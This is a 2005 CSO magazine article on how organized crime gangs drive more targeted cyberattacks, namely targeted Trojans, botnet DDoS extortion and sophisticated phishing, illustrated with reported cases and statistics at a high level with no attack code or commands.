Source: [id: 41018; name: CSO; isActive: true; siteId: 3] -- CSO -- $content.altguid

Increasing Organized Crime Involvement Means More Targeted Attacks

By Paul Stamp with Jonathan Penn, Merv Adrian and Benjamin Gray

An increase of targeted cybercrime leads to organized gangs who are using more sophisticated methods.

By No Analyst or Consultant

October 12, 2005CSO

Attacks on computer security infrastructure used to be little more than indiscriminate acts of vandalism perpetrated by hackers who desired bragging rights more than anything. But the perpetrators of attacks and their motivations have changed. Security intelligence experts have detected the tell-tale signs of organized crime gangs and government espionage in attacks, and a hacker community much more motivated by financial gain than personal or political fulfillment. The resulting increase in attack sophistication means that companies must adopt a more vigilant and correspondingly sophisticated approach to defending their environments.

New Genres of Attack Indicate Organized Criminal Involvement

In recent times, security attacks have become far more sophisticated in nature, targeted at particular organizations and user groups, and designed for financial gain. Three particular types of attack are becoming more common:

  • Targeted Trojans. Targeted Trojan attacks have much the same effect as conventional Trojans, often opening back doors and covert channels for the theft of information. What makes targeted Trojans different though is that they are made specifically for use against a particular organization or user group. Moreover, because they are not widespread, they slip under the radar of most antivirus (AV) vendors looking to develop new signatures and are seldom detected by AV software. For example, the UK National Infrastructure Security Coordination Centre (NISCC) reported a sophisticated targeted Trojan attack on the UK Ministry of Defence and other government agencies. In another case, the Grams e-gold attack sent an email to users, purporting to be from the IT organization, prompting them to run a script to update configuration settings. In reality, the script connected to the Internet and then downloaded and executed a program that monitors the user surfing the Web. Then, if the user accessed an account at the financial Web site www.e-gold.com, the Trojan opened a hidden Web session in the background and drained the users account.

  • Zombie bot attacks. In the last couple of years, there has been an explosion in the number of attacks that start by infecting legions of home computers connected to the Internet with specific malware. These networks of infected machines are often known as "zombie bot networks" or "botnets" and hackers then take control of these machines and use them to send spam, phishing messages, or launch distributed denial of service (DDoS) attacks on Web sites. Researchers at messaging security vendor CipherTrust found, on average, more than 170,000 newly infected zombie machines every day during May 2005. Another worrying aspect of zombie bot DDoS attacks is that they often go hand-in-hand with an attempt to extort money from the victim organization. Typically, the criminal sends the victim a demand for money or else they will launch a DDoS attack against the victim's Web site. However, in contrast to a virus or worm that hits globally and gets extensive publicity, a DDoS extortion attack hits one organization, and they generally keep very quiet about it.1 In the UK, the National Hi-Tech Crime Unit (NHTCU) reported that more than 50 UK companies had been hit by DDoS extortion attacks in 2004, and last summer, they arrested members of a Russian crime gang who had netted £1.3 million in 90 days, via this type of extortion.

  • Sophisticated phishing and message-based fraud attacks. Email- and IM-based phishing attacks are getting more sophisticated and more targeted, sometimes using multiple vectors of attack to obtain information from system users. For example, one recent phishing attack appeared to direct users toward the search site Ask Jeeves, but instead directed them to a spoofed site that downloaded a keylogger onto their machine.2 The keylogger then waited until the user accessed an online banking application and forwarded the keystrokes to a malicious Web site. Also, last November phishers used cross-site scripting vulnerabilities in SunTrust Banks' and Citibank Australia's Web sites to make the target URLs in phishing emails appear legitimate.

RESOURCE CENTER